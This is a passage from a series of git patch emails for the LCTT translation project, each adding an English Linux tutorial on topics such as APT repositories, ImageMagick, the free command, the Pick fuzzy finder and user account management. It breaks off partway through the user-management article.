+### Method-2 : Using GNOME Shell extension
+
+Lightweight [GNOME shell extension][4] to change your wallpaper every day to Microsoft Bing's wallpaper. It will also show a notification containing the title and the explanation of the image.
+
+This extension is based extensively on the NASA APOD extension by Elinvention and inspired by Bing Desktop WallpaperChanger by Utkarsh Gupta.
+
+### Features
+
+ * Fetches the Bing wallpaper of the day and sets as both lock screen and desktop wallpaper (these are both user selectable)
+ * Optionally force a specific region (i.e. locale)
+ * Automatically selects the highest resolution (and most appropriate wallpaper) in multiple monitor setups
+ * Optionally clean up Wallpaper directory after between 1 and 7 days (delete oldest first)
+ * Only attempts to download wallpapers when they have been updated
+ * Doesn't poll continuously - only once per day and on startup (a refresh is scheduled when Bing is due to update)
+
+
+
+### How to install
+
+Visit [extenisons.gnome.org][5] website and drag the toggle button to `ON` then hit `Install` button to install bing wallpaper GNOME extension.
+[![][2]![][2]][6]
+
+After install the bing wallpaper GNOME extension, it will automatically download and set bing Photo of the Day for your Linux desktop, also it shows the notification about the wallpaper.
+[![][2]![][2]][7]
+
+Tray indicator, will help you to perform few operations also open settings.
+[![][2]![][2]][8]
+
+Customize the settings based on your requirement.
+[![][2]![][2]][9]
+
+--------------------------------------------------------------------------------
+
+via: https://www.2daygeek.com/bing-desktop-wallpaper-changer-linux-bing-photo-of-the-day/
+
+作者:[2daygeek][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.2daygeek.com/author/2daygeek/
+[1]:https://github.com/UtkarshGpta/bing-desktop-wallpaper-changer
+[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[3]:https://www.2daygeek.com/wp-content/uploads/2017/09/bing-wallpaper-changer-linux-5.png
+[4]:https://github.com/neffo/bing-wallpaper-gnome-extension
+[5]:https://extensions.gnome.org/extension/1262/bing-wallpaper-changer/
+[6]:https://www.2daygeek.com/wp-content/uploads/2017/09/bing-wallpaper-changer-for-linux-1.png
+[7]:https://www.2daygeek.com/wp-content/uploads/2017/09/bing-wallpaper-changer-for-linux-2.png
+[8]:https://www.2daygeek.com/wp-content/uploads/2017/09/bing-wallpaper-changer-for-linux-3.png
+[9]:https://www.2daygeek.com/wp-content/uploads/2017/09/bing-wallpaper-changer-for-linux-4.png
From fa6fb775146f07cb15a5717e6d138c1adf95ec13 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:00:39 +0800
Subject: [PATCH 054/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Easy=20APT=20Repo?=
=?UTF-8?q?sitory=20=C2=B7=20Iain=20R.=20Learmonth?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Easy APT Repository - Iain R. Learmonth.md | 83 +++++++++++++++++++
1 file changed, 83 insertions(+)
create mode 100644 sources/tech/20170920 Easy APT Repository - Iain R. Learmonth.md
diff --git a/sources/tech/20170920 Easy APT Repository - Iain R. Learmonth.md b/sources/tech/20170920 Easy APT Repository - Iain R. Learmonth.md
new file mode 100644
index 0000000000..b0031f8c94
--- /dev/null
+++ b/sources/tech/20170920 Easy APT Repository - Iain R. Learmonth.md
@@ -0,0 +1,83 @@
+Easy APT Repository · Iain R. Learmonth
+======
+
+The [PATHspider][5] software I maintain as part of my work depends on some features in [cURL][6] and in [PycURL][7] that have [only][8] [just][9] been mereged or are still [awaiting][10] merge. I need to build a docker container that includes these as Debian packages, so I need to quickly build an APT repository.
+
+A Debian repository can essentially be seen as a static website and the contents are GPG signed so it doesn't necessarily need to be hosted somewhere trusted (unless availability is critical for your application). I host my blog with [Netlify][11], a static website host, and I figured they would be perfect for this use case. They also [support open source projects][12].
+
+There is a CLI tool for netlify which you can install with:
+```
+sudo apt install npm
+sudo npm install -g netlify-cli
+
+```
+
+The basic steps for setting up a repository are:
+```
+mkdir repository
+cp /path/to/*.deb repository/
+
+
+cd
+
+ repository
+apt-ftparchive packages . > Packages
+apt-ftparchive release . > Release
+gpg --clearsign -o InRelease Release
+netlify deploy
+
+```
+
+Once you've followed these steps, and created a new site on Netlify, you'll be able to manage this site also through the web interface. A few things you might want to do are set up a custom domain name for your repository, or enable HTTPS with Let's Encrypt. (Make sure you have `apt-transport-https` if you're going to enable HTTPS though.)
+
+To add this repository to your apt sources:
+```
+gpg --export -a YOURKEYID | sudo apt-key add -
+
+
+echo
+
+
+
+"deb https://SUBDOMAIN.netlify.com/ /"
+
+ | sudo tee -a /etc/apt/sources.list
+sudo apt update
+
+```
+
+You'll now find that those packages are installable. Beware of [APT pinning][13] as you may find that the newer versions on your repository are not actually the preferred versions according to your policy.
+
+**Update** : If you're wanting a solution that would be more suitable for regular use, take a look at [repropro][14]. If you're wanting to have end-users add your apt repository as a third-party repository to their system, please take a look at [this page on the Debian wiki][15] which contains advice on how to instruct users to use your repository.
+
+**Update 2** : Another commenter has pointed out [aptly][16], which offers a greater feature set and removes some of the restrictions imposed by repropro. I've never use aptly myself so can't comment on specifics, but from the website it looks like it might be a nicely polished tool.
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://iain.learmonth.me/blog/2017/2017w383/
+
+作者:[Iain R. Learmonth][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://iain.learmonth.me
+[1]:https://iain.learmonth.me/tags/netlify/
+[2]:https://iain.learmonth.me/tags/debian/
+[3]:https://iain.learmonth.me/tags/apt/
+[4]:https://iain.learmonth.me/tags/foss/
+[5]:https://pathspider.net
+[6]:http://curl.haxx.se/
+[7]:http://pycurl.io/
+[8]:https://github.com/pycurl/pycurl/pull/456
+[9]:https://github.com/pycurl/pycurl/pull/458
+[10]:https://github.com/curl/curl/pull/1847
+[11]:http://netlify.com/
+[12]:https://www.netlify.com/open-source/
+[13]:https://wiki.debian.org/AptPreferences
+[14]:https://mirrorer.alioth.debian.org/
+[15]:https://wiki.debian.org/DebianRepository/UseThirdParty
+[16]:https://www.aptly.info/
From 1b794d4da239c9bd5a02aadf8c4bbb861138f375 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:06:39 +0800
Subject: [PATCH 055/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Advanced=20image?=
=?UTF-8?q?=20viewing=20tricks=20with=20ImageMagick?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...d image viewing tricks with ImageMagick.md | 113 ++++++++++++++++++
1 file changed, 113 insertions(+)
create mode 100644 sources/tech/20170925 Advanced image viewing tricks with ImageMagick.md
diff --git a/sources/tech/20170925 Advanced image viewing tricks with ImageMagick.md b/sources/tech/20170925 Advanced image viewing tricks with ImageMagick.md
new file mode 100644
index 0000000000..7aabd73564
--- /dev/null
+++ b/sources/tech/20170925 Advanced image viewing tricks with ImageMagick.md
@@ -0,0 +1,113 @@
+Advanced image viewing tricks with ImageMagick
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/osdc-photo-camera-green.png?itok=qiDqmXV1)
+
+In my [introduction to ImageMagick][1], I showed how to use the application's menus to edit and add effects to your images. In this follow-up, I'll show additional ways to use this open source image editor to view your images.
+
+### Another effect
+
+Before diving into advanced image viewing with ImageMagick, I want to share another interesting, yet simple, effect using the **convert** command, which I discussed in detail in my previous article. This involves the
+ **-edge** option, then **negate** :
+```
+convert DSC_0027.JPG -edge 3 -negate edge3+negate.jpg
+```
+
+![Using the edge and negate options on an image.][3]
+
+
+Before and after example of using the edge and negate options on an image.
+
+There are a number of things I like about the edited image--the appearance of the sea, the background and foreground vegetation, but especially the sun and its reflection, and also the sky.
+
+### Using display to view a series of images
+
+If you're a command-line user like I am, you know that the shell provides a lot of flexibility and shortcuts for complex tasks. Here I'll show one example: the way ImageMagick's **display** command can overcome a problem I've had reviewing images I import with the [Shotwell][4] image manager for the GNOME desktop.
+
+Shotwell creates a nice directory structure that uses each image's [Exif][5] data to store imported images based on the date they were taken or created. You end up with a top directory for the year, subdirectories for each month (01, 02, 03, and so on), followed by another level of subdirectories for each day of the month. I like this structure, because finding an image or set of images based on when they were taken is easy.
+
+This structure is not so great, however, when I want to review all my images for the last several months or even the whole year. With a typical image viewer, this involves a lot of jumping up and down the directory structure, but ImageMagick's **display** command makes it simple. For example, imagine that I want to look at all my pictures for this year. If I enter **display** on the command line like this:
+```
+display -resize 35 % 2017 /*/*/*.JPG
+```
+
+I can march through the year, month by month, day by day.
+
+Now imagine I'm looking for an image, but I can't remember whether I took it in the first half of 2016 or the first half of 2017. This command:
+```
+display -resize 35% 201[6-7]/0[1-6]/*/*.JPG
+```
+
+restricts the images shown to January through June of 2016 and 2017.
+
+### Using montage to view thumbnails of images
+
+Now say I'm looking for an image that I want to edit. One problem is that **display** shows each image's filename, but not its place in the directory structure, so it's not obvious where I can find that image. Also, when I (sporadically) download images from my camera, I clear them from the camera's storage, so the filenames restart at **DSC_0001.jpg** at unpredictable times. Finally, it can take a lot of time to go through 12 months of images when I use **display** to show an entire year.
+
+This is where the **montage** command, which puts thumbnail versions of a series of images into a single image, can be very useful. For example:
+```
+montage -label %d/%f -title 2017 -tile 5x -resize 10% -geometry +4+4 2017/0[1-4]/*/*.JPG 2017JanApr.jpg
+```
+
+From left to right, this command starts by specifying a label for each image that consists of the filename ( **%f** ) and its directory ( **%d** ) structure, separated with **/**. Next, the command specifies the main directory as the title, then instructs the montage to tile the images in five columns, with each image resized to 10% (which fits my monitor's screen easily). The geometry setting puts whitespace around each image. Finally, it specifies which images to include in the montage, and an appropriate filename to save the montage ( **2017JanApr.jpg** ). So now the image **2017JanApr.jpg** becomes a reference I can use over and over when I want to view all my images from this time period.
+
+### Managing memory
+
+You might wonder why I specified just a four-month period (January to April) for this montage. Here is where you need to be a bit careful, because **montage** can consume a lot of memory. My camera creates image files that are about 2.5MB each, and I have found that my system's memory can pretty easily handle 60 images or so. When I get to around 80, my computer freezes when other programs, such as Firefox and Thunderbird, are running the background. This seems to relate to memory usage, which goes up to 80% or more of available RAM for **montage**. (You can check this by running **top** while you do this procedure.) If I shut down all other programs, I can manage 80 images before my system freezes.
+
+Here's how you can get some sense of how many files you're dealing with before running the **montage** command:
+```
+ls 2017/0[1-4/*/*.JPG > filelist; wc -l filelist
+```
+
+The command **ls** generates a list of the files in our search and saves it to the arbitrarily named filelist. Then, the **wc** command with the **-l** option reports how many lines are in the file, in other words, how many files **ls** found. Here's my output:
+```
+163 filelist
+```
+
+Oops! There are 163 images taken from January through April, and creating a montage of all of them would almost certainly freeze up my system. I need to trim down the list a bit, maybe just to March or even earlier. But what if I took a lot of pictures from April 20 to 30, and I think that's a big part of my problem. Here's how the shell can help us figure this out:
+```
+ls 2017/0[1-3]/*/*.JPG > filelist; ls 2017/04/0[1-9]/*.JPG >> filelist; ls 2017/04/1[0-9]/*.JPG >> filelist; wc -l filelist
+```
+
+This is a series of four commands all on one line, separated by semicolons. The first command specifies the number of images taken from January to March; the second adds April 1 through 9 using the **> >** append operator; the third appends April 10 through 19. The fourth command, **wc -l** , reports:
+```
+81 filelist
+```
+
+I know 81 files should be doable if I shut down my other applications.
+
+Managing this with the **montage** command is easy, since we're just transposing what we did above:
+```
+montage -label %d/%f -title 2017 -tile 5x -resize 10% -geometry +4+4 2017/0[1-3]/*/*.JPG 2017/04/0[1-9]/*.JPG 2017/04/1[0-9]/*.JPG 2017Jan01Apr19.jpg
+```
+
+The last filename in the **montage** command will be the output; everything before that is input and is read from left to right. This took just under three minutes to run and resulted in an image about 2.5MB in size, but my system was sluggish for a bit afterward.
+
+### Displaying the montage
+
+When you first view a large montage using the **display** command, you may see that the montage's width is OK, but the image is squished vertically to fit the screen. Don't worry; just left-click the image and select **View > Original Size**. Click again to hide the menu.
+
+I hope this has been helpful in showing you new ways to view your images. In my next article, I'll discuss more complex image manipulation.
+
+
+### About The Author
+Greg Pittman;Greg Is A Retired Neurologist In Louisville;Kentucky;With A Long-Standing Interest In Computers;Programming;Beginning With Fortran Iv In The When Linux;Open Source Software Came Along;It Kindled A Commitment To Learning More;Eventually Contributing. He Is A Member Of The Scribus Team.
+
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/9/imagemagick-viewing-images
+
+作者:[Greg Pittman][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/greg-p
+[1]:https://opensource.com/article/17/8/imagemagick
+[2]:/file/370946
+[3]:https://opensource.com/sites/default/files/u128651/edge3negate.jpg (Using the edge and negate options on an image.)
+[4]:https://wiki.gnome.org/Apps/Shotwell
+[5]:https://en.wikipedia.org/wiki/Exif
From e79ef921ad0c608f079d8a2cf6467bc73fcfa54f Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:08:18 +0800
Subject: [PATCH 056/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20Free=20Co?=
=?UTF-8?q?mmand=20Explained=20for=20Beginners=20(6=20Examples)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nd Explained for Beginners (6 Examples).md | 120 ++++++++++++++++++
1 file changed, 120 insertions(+)
create mode 100644 sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
diff --git a/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md b/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
new file mode 100644
index 0000000000..9cdd4c4b1c
--- /dev/null
+++ b/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
@@ -0,0 +1,120 @@
+Linux Free Command Explained for Beginners (6 Examples)
+======
+
+Sometimes, while working on the command line in Linux, you might want to quickly take a look at the total available as well as used memory in the system. If you're a Linux newbie, you'll be glad to know there exists a built-in command - dubbed **free** \- that displays this kind of information.
+
+In this tutorial, we will discuss the basics of the free command as well as some of the important features it provides. But before we do that, it's worth sharing that all commands/instructions mentioned here have been tested on Ubuntu 16.04LTS.
+
+### Linux free command
+
+Here's the syntax of the free command:
+
+free [options]
+
+And following is how the tool's man page describes it:
+```
+free displays the total amount of free and used physical and swap memory in the system, as well as
+the buffers and caches used by the kernel. The information is gathered by parsing
+/proc/meminfo.
+```
+
+Following are some Q&A-styled examples that should give you a good idea about how the free command works.
+
+### Q1. How to view used and available memory using free command?
+
+This is very easy. All you have to do is to run the free command without any options.
+
+free
+
+Here's the output the free command produced on my system:
+
+[![view used and available memory using free command][1]][2]
+
+And here's what these columns mean:
+
+[![Free command columns][3]][4]
+
+### Q2. How to change the display metric?
+
+If you want, you can change the display metric of memory figures that the free command produces in output. For example, if you want to display memory in megabytes, you can use the **-m** command line option.
+
+free -m
+
+[![free command display metrics change][5]][6]
+
+Similarly, you can use **-b** for bytes, **-k** for kilobytes, **-m** for megabytes, **-g** for gigabytes, **\--tera** for terabytes.
+
+### Q3. How to display memory figures in human readable form?
+
+The free command also offers an option **-h** through which you can ask the tool to display memory figures in human-readable form.
+
+free -h
+
+With this option turned on, the command decides for itself which display metric to use for individual memory figures. For example, here's how the -h option worked in our case:
+
+[![diplsy data fromm free command in human readable form][7]][8]
+
+### Q4. How to make free display results continuously with time gap?
+
+If you want, you can also have the free command executed in a way that it continuously displays output after a set time gap. For this, use the **-s** command line option. This option requires user to pass a numeric value that will be treated as the number of seconds after which output will be displayed.
+
+For example, to keep a gap of 3 seconds, run the command in the following way:
+
+free -s 3
+
+In this setup, if you want free to run only a set number of times, you can use the **-c** command option, which requires a count value to be passed to it. For example:
+
+free -s 3 -c 5
+
+The aforementioned command will make sure the tool runs 5 times, with a 3 second time gap between each of the tries.
+
+**Note** : This functionality is currently [buggy][9], so we couldn't test it at our end.
+
+### Q5. How to make free use power of 1000 (not 1024) while displaying memory figures?
+
+If you change the display metric to say megabytes (using -m option), but want the figures to be calculated based on power of 1,000 (not 1024), then this can be done using the **\--si** option. For example, the following screenshot shows the difference in output with and without this option:
+
+[![How to make free use power of 1000 \(not 1024\) while displaying memory figures][10]][11]
+
+### Q6. How to make free display total of columns?
+
+If you want free to display a total of all memory figures in each column, then you can use the **-t** command line option.
+
+free -t
+
+Following screenshot shows this command line option in action:
+
+[![How to make free display total of columns][12]][13]
+
+Note the new 'Total' row that's displayed in this case.
+
+### Conclusion
+
+The free command can prove to be an extremely useful tool if you're into system administration. It's easy to understand and use, with many options to customize output. We've covered many useful options in this tutorial. After you're done practicing these, head to the command's [man page][14] for more.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-free-command/
+
+作者:[Himanshu Arora][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/linux_free_command/free-command-output.png
+[2]:https://www.howtoforge.com/images/linux_free_command/big/free-command-output.png
+[3]:https://www.howtoforge.com/images/linux_free_command/free-output-columns.png
+[4]:https://www.howtoforge.com/images/linux_free_command/big/free-output-columns.png
+[5]:https://www.howtoforge.com/images/linux_free_command/free-m-option.png
+[6]:https://www.howtoforge.com/images/linux_free_command/big/free-m-option.png
+[7]:https://www.howtoforge.com/images/linux_free_command/free-h.png
+[8]:https://www.howtoforge.com/images/linux_free_command/big/free-h.png
+[9]:https://bugs.launchpad.net/ubuntu/+source/procps/+bug/1551731
+[10]:https://www.howtoforge.com/images/linux_free_command/free-si-option.png
+[11]:https://www.howtoforge.com/images/linux_free_command/big/free-si-option.png
+[12]:https://www.howtoforge.com/images/linux_free_command/free-t-option.png
+[13]:https://www.howtoforge.com/images/linux_free_command/big/free-t-option.png
+[14]:https://linux.die.net/man/1/free
From 6a4d9c2e07ea067e9540158983cf20d44561a2bd Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:12:45 +0800
Subject: [PATCH 057/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20A=20Commandline?=
=?UTF-8?q?=20Fuzzy=20Search=20Tool=20For=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Commandline Fuzzy Search Tool For Linux.md | 138 ++++++++++++++++++
1 file changed, 138 insertions(+)
create mode 100644 sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
diff --git a/sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md b/sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
new file mode 100644
index 0000000000..ae599ad22b
--- /dev/null
+++ b/sources/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
@@ -0,0 +1,138 @@
+translating by lujun9972
+A Commandline Fuzzy Search Tool For Linux
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/search-720x340.jpg)
+Today, we will be discussing about an Interesting commandline utility called **" Pick"**. It allows users to select from a set of choices using an ncurses(3X) interface with fuzzy search functionality. The Pick utility can be helpful in certain situations where you wanted to search for a folder or file that contains a non-English characters in their name. You don't have to learn how to type the non-english characters. Using Pick, you can easily search them, select them and view or cd into them easily. You don't even have to type any characters to search a file or folder. It's good for those working with large pile of directories and files.
+
+### Pick - A Commandline Fuzzy Search Tool For Linux
+
+#### Installing Pick
+
+For **Arch Linux** and its derivatives, Pick is available in [**AUR**][1]. So, the Arch users can install it using AUR helper tools such as [**Pacaur**][2], [**Packer**][3], and [**Yaourt**][4] etc.
+```
+pacaur -S pick
+```
+
+Or,
+```
+packer -S pick
+```
+
+Or,
+```
+yaourt -S pick
+```
+
+The **Debian** , **Ubuntu** , **Linux Mint** users run the following command to install Pick.
+```
+sudo apt-get install pick
+```
+
+For other distributions, download the latest release from [**here**][5] and follow the below instructions to install Pick. As of writing this guide, the latest version was 1.9.0.
+```
+wget https://github.com/calleerlandsson/pick/releases/download/v1.9.0/pick-1.9.0.tar.gz
+tar -zxvf pick-1.9.0.tar.gz
+cd pick-1.9.0/
+```
+
+Configure it using command:
+```
+./configure
+```
+
+Finally, build and install pick:
+```
+make
+sudo make install
+```
+
+#### Usage
+
+By combining it with other commands will make your commandline life much easier. I will show some examples, so you can understand how it works.
+
+Let me create a stack of directories.
+```
+mkdir -p abcd/efgh/ijkl/mnop/qrst/uvwx/yz/
+```
+
+Now, you want to go the directory /ijkl/ directory. You have two choice. You can either use **cd** command like below:
+```
+cd abcd/efgh/ijkl/
+```
+
+Or, create a [**shortcut**][6] or an alias to that directory, so you can switch to the directory in no time.
+
+Alternatively, just use "pick" command to switch a particular directory more easily. Have a look at the below example.
+```
+cd $(find . -type d | pick)
+```
+
+This command will list all directories and its sub-directories in the current working directory, so you can just select any directory you'd like to cd into using Up/Down arrows, and hit ENTER key.
+
+**Sample output:**
+
+[![][7]][8]
+
+Also, it will suggest the directories or files that contains a specific letters as you type them. For example, the following output shows the list of suggestions when I type "or".
+
+[![][7]][9]
+
+It's just an example. You can use "pick" command along with other commands as well.
+
+Here is an another example.
+```
+find -type f | pick | xargs less
+```
+
+This command will allow you to select any file in the current directory to view in less.
+
+[![][7]][10]
+
+Care to learn another example? Here you go. The following command will allow you to select individual files or folders in the current directory you want to move to any destination of your choice, for example **/home/sk/ostechnix**.
+```
+mv "$(find . -maxdepth 1 |pick)" /home/sk/ostechnix/
+```
+
+[![][7]][11]
+
+Choose the file(s) by using Up/Down arrows and hit ENTER to move them to /home/sk/ostechnix/ directory.
+
+[![][7]][12]
+
+As you see in the above output, I have moved the folder called "abcd" to "ostechnix" directory.
+
+The use cases are unlimited. There is also a plugin called [**pick.vim**][13] for Vim editor to make your searches much easier inside Vim editor.
+
+For more details, refer man pages.
+```
+man pick
+```
+
+That's all for now folks. Hope this utility helps. If you find our guides useful, please share them on your social, professional networks and recommended OSTechNix blog to all your contacts.
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/pick-commandline-fuzzy-search-tool-linux/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://aur.archlinux.org/packages/pick/
+[2]:https://www.ostechnix.com/install-pacaur-arch-linux/
+[3]:https://www.ostechnix.com/install-packer-arch-linux-2/
+[4]:https://www.ostechnix.com/install-yaourt-arch-linux/
+[5]:https://github.com/calleerlandsson/pick/releases/
+[6]:https://www.ostechnix.com/create-shortcuts-frequently-used-directories-shell/
+[7]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[8]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_001-3.png ()
+[9]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_002-1.png ()
+[10]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_004-1.png ()
+[11]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_005.png ()
+[12]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_006-1.png ()
+[13]:https://github.com/calleerlandsson/pick.vim/
From dfbadcaaa556aa8fdf09e6c38019d14f45e78b59 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:14:45 +0800
Subject: [PATCH 058/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Managing=20users?=
=?UTF-8?q?=20on=20Linux=20systems?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...0170926 Managing users on Linux systems.md | 223 ++++++++++++++++++
1 file changed, 223 insertions(+)
create mode 100644 sources/tech/20170926 Managing users on Linux systems.md
diff --git a/sources/tech/20170926 Managing users on Linux systems.md b/sources/tech/20170926 Managing users on Linux systems.md
new file mode 100644
index 0000000000..9842eab1d5
--- /dev/null
+++ b/sources/tech/20170926 Managing users on Linux systems.md
@@ -0,0 +1,223 @@
+Managing users on Linux systems
+======
+Your Linux users may not be raging bulls, but keeping them happy is always a challenge as it involves managing their accounts, monitoring their access rights, tracking down the solutions to problems they run into, and keeping them informed about important changes on the systems they use. Here are some of the tasks and tools that make the job a little easier.
+
+### Configuring accounts
+
+Adding and removing accounts is the easier part of managing users, but there are still a lot of options to consider. Whether you use a desktop tool or go with command line options, the process is largely automated. You can set up a new user with a command as simple as **adduser jdoe** and a number of things will happen. John 's account will be created using the next available UID and likely populated with a number of files that help to configure his account. When you run the adduser command with a single argument (the new username), it will prompt for some additional information and explain what it is doing.
+```
+$ sudo adduser jdoe
+Adding user `jdoe' ...
+Adding new group `jdoe' (1001) ...
+Adding new user `jdoe' (1001) with group `jdoe' ...
+Creating home directory `/home/jdoe' ...
+Copying files from `/etc/skel' …
+Enter new UNIX password:
+Retype new UNIX password:
+passwd: password updated successfully
+Changing the user information for jdoe
+Enter the new value, or press ENTER for the default
+ Full Name []: John Doe
+ Room Number []:
+ Work Phone []:
+ Home Phone []:
+ Other []:
+Is the information correct? [Y/n] Y
+
+```
+
+As you can see, adduser adds the user's information (to the /etc/passwd and /etc/shadow files), creates the new home directory and populates it with some files from /etc/skel, prompts for you to assign the initial password and identifying information, and then verifies that it's got everything right. If you answer "n" for no at the final "Is the information correct?" prompt, it will run back through all of your previous answers, allowing you to change any that you might want to change.
+
+Once an account is set up, you might want to verify that it looks as you'd expect. However, a better strategy is to ensure that the choices being made "automagically" match what you want to see _before_ you add your first account. The defaults are defaults for good reason, but it 's useful to know where they're defined in case you want some to be different - for example, if you don't want home directories in /home, you don't want user UIDs to start with 1000, or you don't want the files in home directories to be readable by _everyone_ on the system.
+
+Some of the details of how the adduser command works are configured in the /etc/adduser.conf file. This file contains a lot of settings that determine how new accounts are configured and will look something like this. Note that the comments and blanks lines are omitted in the output below so that we can focus more easily on just the settings.
+```
+$ cat /etc/adduser.conf | grep -v "^#" | grep -v "^$"
+DSHELL=/bin/bash
+DHOME=/home
+GROUPHOMES=no
+LETTERHOMES=no
+SKEL=/etc/skel
+FIRST_SYSTEM_UID=100
+LAST_SYSTEM_UID=999
+FIRST_SYSTEM_GID=100
+LAST_SYSTEM_GID=999
+FIRST_UID=1000
+LAST_UID=29999
+FIRST_GID=1000
+LAST_GID=29999
+USERGROUPS=yes
+USERS_GID=100
+DIR_MODE=0755
+SETGID_HOME=no
+QUOTAUSER=""
+SKEL_IGNORE_REGEX="dpkg-(old|new|dist|save)"
+
+```
+
+As you can see, we've got a default shell (DSHELL), the starting value for UIDs (FIRST_UID), the location for home directories (DHOME) and the source location for startup files (SKEL) that will be added to each account as it is set up - along with a number of additional settings. This file also specifies the permissions to be assigned to home directories (DIR_MODE).
+
+One of the more important settings is DIR_MODE, which determines the permissions that are used for each user's home directory. Given this setting, the permissions assigned to a directory that the user creates will be 755. Given this setting, home directories will be set up with rwxr-xr-x permissions. Users will be able to read other users' files, but not modify or remove them. If you want to be more restrictive, you can change this setting to 750 (no access by anyone outside the user's group) or even 700 (no access but the user himself).
+
+Any user account settings can be manually changed after the accounts are set up. For example, you can edit the /etc/passwd file or chmod home directory, but configuring the /etc/adduser.conf file _before_ you start adding accounts on a new server will ensure some consistency and save you some time and trouble over the long run.
+
+Changes to the /etc/adduser.conf file will affect all accounts that are set up subsequent to those changes. If you want to set up some specific account differently, you've also got the option of providing account configuration options as arguments with the adduser command in addition to the username. Maybe you want to assign a different shell for some user, request a specific UID, or disable logins altogether. The man page for the adduser command will display some of your choices for configuring an individual account.
+```
+adduser [options] [--home DIR] [--shell SHELL] [--no-create-home]
+[--uid ID] [--firstuid ID] [--lastuid ID] [--ingroup GROUP | --gid ID]
+[--disabled-password] [--disabled-login] [--gecos GECOS]
+[--add_extra_groups] [--encrypt-home] user
+
+```
+
+These days probably every Linux system is, by default, going to put each user into his or her own group. As an admin, you might elect to do things differently. You might find that putting users in shared groups works better for your site, electing to use adduser's --gid option to select a specific group. Users can, of course, always be members of multiple groups, so you have some options on how to manage groups -- both primary and secondary.
+
+### Dealing with user passwords
+
+Since it's always a bad idea to know someone else's password, admins will generally use a temporary password when they set up an account and then run a command that will force the user to change his password on his first login. Here's an example:
+```
+$ sudo chage -d 0 jdoe
+
+```
+
+When the user logs in, he will see something like this:
+```
+WARNING: Your password has expired.
+You must change your password now and login again!
+Changing password for jdoe.
+(current) UNIX password:
+
+```
+
+### Adding users to secondary groups
+
+To add a user to a secondary group, you might use the usermod command as shown below -- to add the user to the group and then verify that the change was made.
+```
+$ sudo usermod -a -G sudo jdoe
+$ sudo grep sudo /etc/group
+sudo:x:27:shs,jdoe
+
+```
+
+Keep in mind that some groups -- like the sudo or wheel group -- imply certain privileges. More on this in a moment.
+
+### Removing accounts, adding groups, etc.
+
+Linux systems also provide commands to remove accounts, add new groups, remove groups, etc. The **deluser** command, for example, will remove the user login entries from the /etc/passwd and /etc/shadow files but leave her home directory intact unless you add the --remove-home or --remove-all-files option. The **addgroup** command adds a group, but will give it the next group id in the sequence (i.e., likely in the user group range) unless you use the --gid option.
+```
+$ sudo addgroup testgroup --gid=131
+Adding group `testgroup' (GID 131) ...
+Done.
+
+```
+
+### Managing privileged accounts
+
